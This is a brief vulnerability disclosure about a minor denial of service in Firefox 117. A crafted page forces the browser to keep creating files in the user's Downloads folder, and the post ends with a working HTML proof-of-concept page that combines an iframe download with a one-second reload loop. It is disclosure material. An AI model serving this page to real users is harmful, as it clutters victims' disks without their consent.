Firefox 117 Denial Of Service

`This is barely a DoS, but since Chrome has explicit protection  
against it, we decided to disclose it.  
  
If firefox user visits a specially crafted page, then firefox  
may create many files in `~/Downloads`,  
The user is notified about this in a small dialog, but there is  
no option to stop the downloads.  
The potential denial of service is that the user must manually  
delete the created files and this might be PITA.  
  
Technically about the PoC: create non-empty file `xml.doc`.  
To force download, add to the page `iframe src="xml.doc"`.  
To force creation of new files, add `body onload="location.reload()"`  
(there are several other options about this).  
  
[Proof of concept][1]  
  
To out surprise, Chrome is safe from this and it distinguishes  
manual download from automated download and this might be because  
it is aware about this DoS.  
  
Affected: firefox 117 on GNU/Linux and reportedly on Windows.  
Not Affected: firefox on android, Chrome, lynx.  
  
[1]: https://j.ludost.net/y3.html  
  
--- poc y3.html ---  
  
<html>  
<body>  
Wait about 20 seconds andcheck for new files in ~/Downloads and also for message from firefox. Written by Georgi Guninski.  
<iframe src="xml.doc" width=10 height=10></iframe>  
<script>  
setInterval(function () {location.reload()},1000);  
</script>  
</body>  
</html>  
  
--- poc y3.html ---  
`